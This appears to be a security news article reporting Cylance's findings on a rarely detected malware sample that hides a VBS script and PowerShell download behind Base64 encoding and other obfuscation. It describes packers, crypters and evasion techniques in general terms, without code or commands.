The malware was discovered while the team at Cylance was studying malicious scripts that were rarely detected by antivirus. A malware file using PowerShell was using a obfuscation method to hide the scripts from detection tools. Cylance describes the file in question as a ZIP with a PDF document and VBS script embedded. Through testing, the company found the malware was discovered by just three antivirus products. In terms of delivery, the package is quite standard and matches familiar obfuscation techniques, such as compressing the malware and encrypting it within code:
Packers, which compress or “pack” a malware program Crypters, which encrypt a malware program (or portions thereof) Other obfuscators, which mutate – but do not neuter – the malware program in a variety of ways, thus changing the overall number of bytes in the program
Once loaded, the malware has a different signature and hash, making it hard to be found by antivirus solutions: “These techniques change the overall structure of a piece of malware without altering its function,” explained Cylance. “Often, this has the overall result of creating layers which act to bury the ultimate payload, like the nested figures in a Russian doll.”
Exploiting PowerShell
Malware uses PowerShell as a legitimacy shield. The VBS script uses a simple enough Base64 encoding to confuse at the first instance. Using Microsoft PowerShell, the VBS script downloads a DAT file undetected. Among the techniques used to achieve this include variable assignment and tick marks to confuse antivirus programs. “The cat-and-mouse game of detection and response isn’t new,” Kevin Livelli, director of threat intelligence at Cylance, told Threatpost. “Attackers, whether they’re advanced groups or common criminals, are astute observers of target defenses and adapt accordingly. Malware doesn’t have to be especially complicated or even new to be effective. Obfuscation gives attackers a simple and cheap way to get the job done until the industry adapts and attackers move on to the next technique.”